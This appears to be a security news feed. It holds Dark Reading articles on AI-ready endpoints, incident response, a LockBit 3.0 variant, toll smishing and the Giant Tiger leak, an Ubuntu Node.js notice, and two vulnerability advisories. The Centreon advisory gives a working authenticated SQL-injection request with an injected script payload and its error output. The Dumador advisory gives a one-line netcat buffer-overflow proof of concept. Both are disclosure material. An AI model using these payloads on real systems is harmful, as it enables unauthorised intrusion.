Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.

The enemies are always getting closer, using the same advanced technologies as security pros are employing to protect their networks. So perhaps it's time for a back-to-basics approach? Come up with a clever cybersecurity-related caption to describe the scene above, and our favorite will win a $25 Amazon gift card.

Here are four convenient ways to submit your ideas before the May 13, 2024, deadline:

*   Via social media: X, Facebook, and LinkedIn. (If you win, we'll respond to you on the same platform, requesting your email address.)
    

**Last Month's Winner**

Great Dark Reading readers' minds think alike! Several captions submitted for last month's contest, "Bridge the Gap," played on the same theme of air gapping. They all made us chuckle, but in the end only one could win. So a round of applause, please, for Bill Cote, a cybersecurity engineer at Leidos. And big thanks to all who submitted an idea!

**About the Author(s)**

John Klossner has been drawing technology cartoons for more than 15 years. His work regularly appears in Computerworld and Federal Computer Week. His illustrations and cartoons have also been published in The New Yorker, Barron's, and The Wall Street Journal.

Name That Toon: Last Line of Defense

Recent analysis shows that enterprises need to think about the impact on security budgets and resources as they adopt new AI-based applications.

Source: Absolute Security Cyber Resilience Risk Index 2024

Enterprises assessing their readiness for artificial intelligence (AI) transformation have to ensure they have devices capable of running AI-enabled applications. A recent analysis by Absolute Security found that the majority of organizations need to update or replace their systems to be AI-ready. Deployments of this size can have significant implications on their cybersecurity risk and resiliency, Absolute Security states.

"Absolute Security Cyber Resilience Risk Index 2024" assesses the state of cyber resilience for global enterprises. The index is based on telemetry from millions of mobile and hybrid PCs running Absolute Security's firmware-based agents. To determine AI-readiness, Absolute Security analyzed over 4 million devices running Windows 10 or 11 to determine how many of them had a minimum of 32 GB of RAM. According to the index, 92% didn't meet the basic requirements needed to efficiently handle modern AI applications.

Absolute Security based the assessment on whether enterprise PCs are capable of supporting AI applications on the recommendation that PCs should be equipped with a minimum of 32 GB of RAM and have either a stand-alone graphics processing unit (GPU) or an integrated neural processing unit (NPU).

"Huge investments in AI-capable endpoint fleets have the potential to divert budget and human resources away from critical IT and security priorities that can leave gaps in security and risk policies," Absolute Security says.

The concern isn't just about diverting resources; Absolute Security notes that new devices being added to the environment can also add complexity. Organizations are already struggling to keep up with patching and making sure the right security controls are in place. New devices could mean defining new controls or adjusting workflows to make sure they are being patched.

While there is a marked improvement between 2023 and 2024, Absolute Security found that organizations are still lagging behind with patches. Most industries continue to run weeks or months behind in complying with their own patching policies, although Windows 11 devices seem to be faring better than Windows 10, the company said.

**About the Author(s)**

Enterprise Endpoints Aren't Ready for AI

Centreon version 23.10-1.el8 suffers from a remote authenticated SQL injection vulnerability.

    ;; Postauth SQL Injection in Centreon 23.10-1.el8;; by code610;; ;; found : 05.03.2024;; version: centreon-vbox-vm-23_10-1.el8.zip;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html;; ;; sqlmap request.txtPOST /centreon/main.get.php?p=60201 HTTP/1.1Host: 192.168.56.156User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 2529Origin: http://192.168.56.156Connection: keep-aliveReferer: http://192.168.56.156/centreon/main.get.php?p=60201&o=aCookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avhUpgrade-Insecure-Requests: 1service_description=2222222222xxxxxxxx22&service_hPars%5B%5D='%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134&macroInput%5B0%5D=MODE&macroValue%5B0%5D=connection-time&macroFrom%5B0%5D=fromTpl&macroTplValue_0=connection-time&macroOriginalName_0=&macroTplValToDisplay_0=1&macroDescription_0=&macroTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=&macroInput%5B1%5D=WARNING&macroValue%5B1%5D=1000&macroFrom%5B1%5D=fromTpl&macroTplValue_1=1000&macroOriginalName_1=&macroTplValToDisplay_1=1&macroDescription_1=&macroTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=&macroInput%5B2%5D=CRITICAL&macroValue%5B2%5D=5000&macroFrom%5B2%5D=fromTpl&macroTplValue_2=5000&macroOriginalName_2=&macroTplValToDisplay_2=1&macroDescription_2=&macroTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save&macroFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1&centreon_token=0e87a8f24318f5221765b62c09cb10bf;; --- ;; init response:        <a href="main.php?p=60201"             class="pathWay">Services by host</a>        </div>SQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not defined<br /><b>Fatal error</b>:  Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=prompt(123)>' AND hsr.service_service_id = service_id AND servi...' at line 1 in /usr/share/centreon/www/class/centreonDB.class.php:311Stack trace:#0 /usr/share/centreon/www/class/centreonDB.class.php(311): PDO->query()#1 /usr/share/centreon/www/include/configuration/configObject/service/DB-Func.php(281): CentreonDB->query()#2 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/Rule/Callback.php(57): testServiceExistence()#3 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/RuleRegistry.php(130): HTML_QuickForm_Rule_Callback->validate()#4 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm.php(1315): HTML_QuickForm_RuleRegistry->validate()#5 /usr/share/centreon/www/include/configuration/configObject/service/formService.php(1156): HTML_QuickForm->validate()#6 /usr/share/centreon/www/include/configuration/configObject/service/serviceByHost.php(127): require_once('...')#7 /usr/share/centreon/www/main.get.php(304): include_once('...')#8 {main}  thrown in <b>/usr/share/centreon/www/class/centreonDB.class.php</b> on line <b>311</b><br />;; --- ;; More:;;   https://code610.blogspot.com;;   https://twitter.com/CodySixteen;; ;; cheers;;

Centreon 23.10-1.el8 SQL Injection

Backdoor.Win32.Dumador.c malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6cc630843cabf23621375830df474bc5.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Dumador.c  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware runs an FTP server on TCP port 10000. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Dumador  
Type: PE32  
MD5: 6cc630843cabf23621375830df474bc5  
SHA256: 634eb7d9f5488b46ac44d784da8d82d98a8d86c1c8ef9a838535d44b8e420ea9  
Vuln ID: MVID-2024-0679  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 04/15/2024

Memory Dump:  
(16e0.150): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000000 edi=00000002  
eip=775ced3c esp=0401f208 ebp=0401f248 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
775ced3c c21400          ret     14h

0:002> .ecxr  
eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194  
eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
kernel32!lstrcpyA+0x1c:  
74657c7c 880c16          mov     byte ptr [esi+edx],cl      ds:002b:04020000=??  
*** WARNING: Unable to verify checksum for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe

0:002> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
kernel32!lstrcpyA+1c  
74657c7c 880c16          mov     byte ptr [esi+edx],cl

EXCEPTION_RECORD:  0401f408 -- (.exr 0x401f408)  
ExceptionAddress: 74657c7c (kernel32!lstrcpyA+0x0000001c)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 04020000  
Attempt to write to address 04020000

PROCESS_NAME:  Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0401f458 -- (.cxr 0x401f458)  
eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194  
eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
kernel32!lstrcpyA+0x1c:  
74657c7c 880c16          mov     byte ptr [esi+edx],cl      ds:002b:04020000=??  
Resetting default scope

WRITE_ADDRESS:  04020000 

FOLLOWUP_IP:   
kernel32!lstrcpyA+1c  
74657c7c 880c16          mov     byte ptr [esi+edx],cl

STACK_ADDR_RAW_STACK_SYMBOL: 401fa34

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 00401bf3 to 74657c7c

FAULTING_THREAD:  ffffffff

DEFAULT_BUCKET_ID:  STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACKIMMUNE

BUGCHECK_STR:  APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

STACK_TEXT:    
00000000 00000000 unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe+0x0

STACK_COMMAND:  .cxr 000000000401F458 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACKIMMUNE_c0000409_unknown!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe

Followup: MachineOwner  
---------

0:002> !exchain  
0401f2c0: ntdll!_except_handler4+0 (775d6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (776157ad)  
0401f8d0: kernel32!_except_handler4+0 (7466d450)  
  CRT scope  0, filter: kernel32!lstrcpyA+2d (74657c8d)  
                func:   kernel32!lstrcpyA+40 (74657ca0)  
0401ffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
python -c "print('A'*2000)" | nc64.exe x.x.x.x 10000  
220 CONNECTED  
ERROR  
ERROR  
ERROR

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Dumador.c MVID-2024-0679 Buffer Overflow

Ubuntu Security Notice 6735-1 - It was discovered that Node.js incorrectly handled the use of invalid public keys while creating an x509 certificate. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 23.10. It was discovered that Node.js incorrectly handled the use of CRLF sequences to delimit HTTP requests. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to obtain unauthorised access. This issue only affected Ubuntu 23.10.

==========================================================================  
Ubuntu Security Notice USN-6735-1  
April 16, 2024

nodejs vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Node.js.

Software Description:  
- nodejs: An open-source, cross-platform JavaScript runtime environment.

Details:

It was discovered that Node.js incorrectly handled the use of invalid public  
keys while creating an x509 certificate. If a user or an automated system were  
tricked into opening a specially crafted input file, a remote attacker could  
possibly use this issue to cause a denial of service. This issue only affected  
Ubuntu 23.10. (CVE-2023-30588)

It was discovered that Node.js incorrectly handled the use of CRLF sequences to  
delimit HTTP requests. If a user or an automated system were tricked into  
opening a specially crafted input file, a remote attacker could possibly use  
this issue to obtain unauthorised access. This issue only affected  
Ubuntu 23.10. (CVE-2023-30589)

It was discovered that Node.js incorrectly described the generateKeys()  
function in the documentation. This inconsistency could possibly lead to  
security issues in applications that use these APIs.  
(CVE-2023-30590)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libnode-dev                     18.13.0+dfsg1-1ubuntu2.2  
   libnode108                      18.13.0+dfsg1-1ubuntu2.2  
   nodejs                          18.13.0+dfsg1-1ubuntu2.2  
   nodejs-doc                      18.13.0+dfsg1-1ubuntu2.2

Ubuntu 22.04 LTS:  
   libnode-dev                     12.22.9~dfsg-1ubuntu3.5  
   libnode72                       12.22.9~dfsg-1ubuntu3.5  
   nodejs                          12.22.9~dfsg-1ubuntu3.5  
   nodejs-doc                      12.22.9~dfsg-1ubuntu3.5

Ubuntu 20.04 LTS:  
   libnode-dev                     10.19.0~dfsg-3ubuntu1.6  
   libnode64                       10.19.0~dfsg-3ubuntu1.6  
   nodejs                          10.19.0~dfsg-3ubuntu1.6  
   nodejs-doc                      10.19.0~dfsg-3ubuntu1.6

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   nodejs                          8.10.0~dfsg-2ubuntu0.4+esm5  
   nodejs-dev                      8.10.0~dfsg-2ubuntu0.4+esm5  
   nodejs-doc                      8.10.0~dfsg-2ubuntu0.4+esm5

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   nodejs                          4.2.6~dfsg-1ubuntu4.2+esm3  
   nodejs-dev                      4.2.6~dfsg-1ubuntu4.2+esm3  
   nodejs-legacy                   4.2.6~dfsg-1ubuntu4.2+esm3

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   nodejs                          0.10.25~dfsg2-2ubuntu1.2+esm2  
   nodejs-dev                      0.10.25~dfsg2-2ubuntu1.2+esm2  
   nodejs-legacy                   0.10.25~dfsg2-2ubuntu1.2+esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6735-1  
   CVE-2023-30588, CVE-2023-30589, CVE-2023-30590

Package Information:  
   https://launchpad.net/ubuntu/+source/nodejs/18.13.0+dfsg1-1ubuntu2.2  
   https://launchpad.net/ubuntu/+source/nodejs/12.22.9~dfsg-1ubuntu3.5  
   https://launchpad.net/ubuntu/+source/nodejs/10.19.0~dfsg-3ubuntu1.6

Ubuntu Security Notice USN-6735-1

Many teams think they're ready for a cyberattack, but events have shown that many don't have an adequate incident response plan.

Chris Crummey, Director, Executive & Board Cyber Services, Sygnia

April 16, 2024

5 Min Read

Source: Yee Xin Tan via Alamy Stock Photo

COMMENTARY

The new Securities and Exchange Commission (SEC) rules on cybersecurity risk management, strategy, governance, and incident disclosure recently went into effect, and organizational approaches to cybersecurity incident response are top of mind for stakeholders at both public and private companies. While most executive leadership teams and corporate board members assume their organizations are ready for a potential cyberattack, recent events have shown that many are ill-prepared to handle what will be their worst day on the job.

A company's response to a crisis is a direct reflection of its preparedness. Rather than focus solely on what happens during and after a cyber incident, executives and leadership teams must first understand that the period preceding an event is most critical. Organizational remediation efforts can and should be developed, tested, and implemented before an attack happens. It is imperative for those at the top to use this time to evaluate how well their teams will respond when thrust into a dire situation and take the necessary steps to ensure cyber readiness.

**Develop and Implement an Incident Response Plan**

Far too many organizations find themselves in the middle of a cyber crisis without a formal response plan in place. Companies make critical errors that can compound the financial and reputational damage associated with a cyber incident due to the simple fact they do not have established roles or responsibilities or a documented chain of command to handle this sort of situation. Within the first hour of the crisis, we see the most instances of job bias emerge and lead to a significant number of mistakes. During that "golden hour," people are unsure of what to do, but they inject themselves into the crisis because they believe it is their job to do something. This lack of understanding ultimately slows down the recovery and remediation process.

There isn't a single blueprint on what an incident response plan should look like, because each crisis is different. However, executives, board members, security teams, and others involved must know who takes the lead in responding, what each person's responsibilities are, and what steps should be taken to communicate internally and externally. The formal incident response plan should include an identified incident commander who works across lines of business and divisions within an organization to ensure each person and department understands the situation and handles their duties as assigned. The incident response commander will also be charged with contacting the company's third-party experts, such as legal, incident response firms, ransom negotiators, and public relations, to ensure they are aware of what has transpired. The cyber incident response protocol should be incorporated into the broader organizational crisis response plan, frequently reviewed and updated as necessary.

**Stress Test the Response Plan in an Active Simulation**

Planned actions can easily be lost in the chaos during a real cyberattack because of the natural psychological response employees have to a crisis. Leaders must understand that those involved in the attack will experience a rush of cortisol, the stress hormone that creates a "fog of war" during turbulent times, and it can lead to additional issues. The most common problem is the inability to validate and verify information. A person's interpretation of what has happened or what has been shared with them can differ significantly from the facts of the incident. The result can escalate a single piece of information about a potential event and turn it into a full-blown crisis.

The best way to evaluate how teams will react to a cyberattack is to put the formal incident response plan to the test. Tabletop and wargame exercises are immersive experiences, conducted in a controlled environment, that prepare enterprises to face and mitigate a potential attack. This gives every person within the organization the opportunity to feel, act, and behave as if they are in the midst of an attack situation. These training exercises allow teams to experience that rush of cortisol, learn how to handle and manage it, and develop the necessary discipline to execute the response plan. This also provides leadership with visibility into how an individual's response impacts the holistic approach to remediation.

**Evaluate the Plan's Efficacy and Improve it **

Once the organization and its cyber incident response plan have been put to the test, the next step is to evaluate the efficacy of the plan and identify opportunities for improvement. It is important to note where the fundamental breakdowns occurred and what can be done to address them. For example, if the communication cadence faltered, why was the team unable to contact the appropriate stakeholders? Was it procedural or did the incident commander not fulfill his or her duties? Leadership should know if it is a matter of committing additional resources to enhance security posture or if they need to incorporate different organizational leaders to spearhead response efforts.

Executives and board members must consider how prepared their team is before the attack happens and how it behaves during the crisis, and understand that the challenges from the wargame exercise are going present themselves when a real attack occurs. It is imperative for leadership to be involved in the evaluation process, as the final decisions will have a widespread impact on key stakeholders. The ability to comprehend how each choice impacts and improves security posture and coverage will boost employee engagement, which is paramount to successfully defending an organization.

Cybersecurity has become a board-level issue in recent years, and it must remain a priority moving forward. It is incumbent on executive leadership to be well-informed about their organization's security response plan and how people respond before, during, and after a cyber crisis. By proactively evaluating their response protocol before an attack begins, board members and executives can shore up their defenses against emerging risks and ensure cyber readiness.

**About the Author(s)**

Director, Executive & Board Cyber Services, Sygnia

Chris Crummey is the Director for Executive and Board Cyber Services globally at Sygnia. For the past eight years, Chris has prepared and advised thousands of companies, SOCs, executives and Boards of Directors on cybersecurity best practices before, during and after a cybersecurity crisis. These best practices focus on the intersection of cybersecurity, risk-based decision making, crisis communications, leadership under pressure and the role human beings play in cybersecurity. As a keynote speaker on these topics, Chris is also a cybersecurity faculty member of “Competent Boards,” which is the original and premier creator of online of ESG training programs for board directors and senior business professionals. Prior to this role, Chris was the Executive Director for the IBM’s X-Force Command Centers globally and specialized in tabletop exercises and cyber wargames.

3 Steps Executives and Boards Should Take to Ensure Cyber Readiness

Kaspersky researchers discovered the new variant after responding to a critical incident targeting an organization in West Africa.

Source: Zoonar Gmbh via Alamy Stock Photo

The LockBit ransomware-as-a-service (RaaS) group has struck another victim, this time using stolen credentials to launch a sophisticated attack against an unidentified organization in West Africa. The attackers used a new variant of the LockBit 3.0 builder, which was leaked in 2022.

Kaspersky researchers discovered the latest variant at the end of March 2024 after responding to the incident in West Africa, describing it at the time as Trojan-Ransom.Win32.Lockbit.gen, Trojan.Multi.Crypmod.gen, and Trojan-Ransom.Win32.Generic. Particularly concerning about this variant is that it can generate custom, self-propagating ransomware that is difficult to defend against.

During the attack, threat actors impersonating an administrator infected multiple hosts with malware, aiming to spread it deeply into the victim's network. According to Kaspersky, the customized ransomware performed various malicious actions, including disabling Windows Defender, encrypting network shares, and deleting Windows Event Logs to avoid discovery of its actions. 

The researchers discovered that the variant can also direct attacks on select systems and infect specific .docx or .xlsx files. "The nature of this finding is rather critical since the use of leaked privileged credentials allows the attackers to have full control of the victim's infrastructure, as well as covering their tracks," says Cristian Souza, an incident response specialist at Kaspersky. 

The organization in West Africa hit by the new LockBit variant is the only victim Kaspersky's Global Emergency Response Team (GERT) has encountered in that area to date, according to Souza. "However, we detected other incidents that used the leaked builder in other regions," he says. 

**The Appeal of LockBit 3.0 to Attackers**

Since it was leaked in 2022, attackers have continued actively using LockBit 3.0 builder to create customized versions and variants. "This opens up numerous possibilities for malicious actors to make their attacks more effective since it is possible to configure network spread options and defense-killing functionality," according to a research brief on the attack and a detailed description of the variant posted by Kaspersky. "It becomes even more dangerous if the attacker has valid privileged credentials in the target infrastructure."

According to a recent Trend Micro report, the LockBit group was responsible for at least 25% of all ransomware attacks in 2023 and has hit thousands of victims since 2020. The LockBit 3.0 builder is a popular tool among threat actors because it doesn't require advanced programming skills.

In February 2024, the Cronos Group, an international law-enforcement group, claimed that it had taken down the group's infrastructure, but less than a week later, LockBit responded that it had recovered and was back in business.

**Protecting Against LockBit Attacks**

As the debate continues over whether LockBit will remain the pervasive force in waging ransomware attacks, Kaspersky advises that organizations take the same steps they would undertake to prevent an attack from any group. Those steps include using properly configured antimalware and endpoint detection software, implementing a managed detection and response solution, conducting vulnerability assessments and penetration tests, and performing and testing backups of critical data.

Further, Sousa recommends network administrators employ network segmentation, enforce multifactor authentication (MFA), whitelist permitted applications, "and have a well-defined incident response plan."

**About the Author(s)**

Jeffrey Schwartz is a journalist who has covered information security and all forms of business and enterprise IT, including client computing, data center and cloud infrastructure, and application development for more than 30 years. Jeff is a regular contributor to Channel Futures. Previously, he was editor-in-chief of Redmond magazine and contributed to its sister titles Redmond Channel Partner, Application Development Trends, and Virtualization Review. Earlier, he held editorial roles with CommunicationsWeek, InternetWeek, and VARBusiness. Jeff is based in the New York City suburb of Long Island.

LockBit 3.0 Variant Generates Custom, Self-Propagating Malware

The scam is spreading across the US and impersonates the specific toll-collection services of each state in malicious SMS messages.

Source: Mira via Alamy Stock Photo

The FBI is warning people about widespread SMS phishing (smishing) campaign spreading "state to state" that's luring people with messages informing them that they have unpaid tolls to resolve. The scam is aimed at stealing their credentials and defrauding them.

There also is evidence that that the campaign — which has been reported by people in three states so far, according to a public service announcement by the FBI Internet Crime Complaint Center (IC3)—affected other parts of the world before it reached US shores.

The campaign, active in the US since at least early March and reported by more than 2,000 people, sends users a text message that appears to come from the road-toll collection service of their specific states, claiming they owe money for unpaid highway tolls.

"We've noticed an outstanding toll amount of $12.51 on your record," the text of one such message reads. "To avoid a late fee of $50.00, visit https://myturnpiketollservices.com to settle your balance."

**Old Social Engineering Trick Remains Effective**

While smishing scams are by no means new, they continue to be used by attackers because they still have the potential to fool users into giving up the valuable credentials that allow for cybercriminals to profit. The FBI's warning alone is a sign that the unpaid-toll campaign is likely to escalate, and is worrying enough to warrant vigilance from potential victims.

The texts "contain almost identical language" and use similar amounts for so-called outstanding tolls. What changes from state to state is that the malicious link provided within the text is created to impersonate the state's toll service name, "and phone numbers appear to change between states," according to the IC3.

The link takes users to what looks very much like the toll services' legitimate websites, asking them to enter information on the pretense of paying the toll. Instead the attackers collect the victim's payment credentials and other sensitive data that potentially could be shared with other cybercriminals and/or used in future social engineering attacks.

**Toll Scam Spreads Across US**

The FBI didn't specify which states are currently being affected by the wave of toll-related attacks, but a quick perusal of social-media platform X, formerly Twitter, found evidence that the scam has at least affected users in Pennsylvania.

The Pennsylvania Turnpike (@PA\_Turnpike), the toll road, and related services that spans the state, posted a warning on social platform X to let users know about the campaign, and encouraged them to report any scam messages to the IC3.

"Some customers have received phishing-attempt text messages claiming to be from the PA Turnpike’s toll services," according to the post. "If you receive such a text, providing you with a link to pay an outstanding toll, do not click on the link, and delete the text."

The scam may be related to a similar one that previously swept across Australia, as people in states in both the eastern and western parts of the country in 2022 and 2023, respectively, also reported on X that they received driving toll-related smishing messages.

Back in August 2022, X user Anthony Campisini posted about a toll scam associated with City Link, a toll freeway service in the southeastern Aussie city of Melbourne, that also tried to lure users in the region with a message about unpaid tolls. Less than a year later, another X user in the state of Western Australia (WA) observed in March 2023 that he had been receiving "a lot of scam" SMS messages informing him that he owes money on road tolls.

"How do I know they are scams?" the user, @EMacskasy, who goes by the X name of "Evan Stop the Killing," posted. "Over here in WA = we do not have tolls on our roads."

**Stay Vigilant**

EMacskasy's observation is a good example of how people being targeted by the scam can avoid being compromised by it — by taking a moment to rationalize if it's even possible that they owe money on tolls before having a knee-jerk reaction and immediately engaging with the message.

The IC3 is advising people to file a complaint with the IC3 on the agency's website if they receive one of the messages and include the following information: the phone number from where the text originated and the website listed within the text.

People also should check any toll-service account that they have by going separately and directly to the service's legitimate website, to ensure that their accounts are in order, and/or contact the legitimate service's customer service phone number to check the account and let them know of the scam. As previously mentioned, people also should delete the texts.

In case someone has already engaged with the link or given information, they should make an effort to secure their personal information and financial accounts, and dispute any unfamiliar charges that may show evidence of cybercriminal activity.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

FBI: Smishing Campaign Lures Victims With Unpaid-Toll Notices

A threat actor claims to be in possession of 2.8 million records originating from a hack at Canadian retail chain Giant Tiger

Someone has posted a database of over 2.8 million records to a hacker forum, claiming they originated from a March 2024 hack at Canadian retail chain Giant Tiger.

When asked, they posted a small snippet as proof. The download of the full database is practically free for other active members of that forum.

In March, one of Giant Tiger‘s vendors, a company used to manage customer communications and engagement, suffered a cyberattack, which impacted Giant Tiger, as reported by CBC.

The retailer first learned of the security incident on March 4, 2024, and concluded that customer information was involved by March 15, according to an email the company wrote to customers. Giant Tiger also noted that the security incident only impacted one of its vendors and didn’t affect the chain’s store systems or applications, saying that “there is no indication of any misuse of the information.”

On April 12, 2024, BleepingComputer noticed a post titled “Giant Tiger Database – Leaked, Download!” on the hacker forum. The records contain over 2.8 million unique email addresses, names, phone numbers and physical addresses.

When contacted by BleepingComputer, Giant Tiger said:

> “We determined that contact information belonging to certain Giant Tiger customers was obtained without authorization. We sent notices to all relevant customers informing them of the situation.”

and:

> “No payment information or passwords were involved.”

Depending on customer’s buying behavior, the data leaked in the breach may vary. Loyalty members and those who placed online orders for in-store pickups might have had their names, emails and phone numbers compromised. Some customers, who placed online orders for home delivery, may have had that same information plus their street addresses compromised.

**Protecting yourself from a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

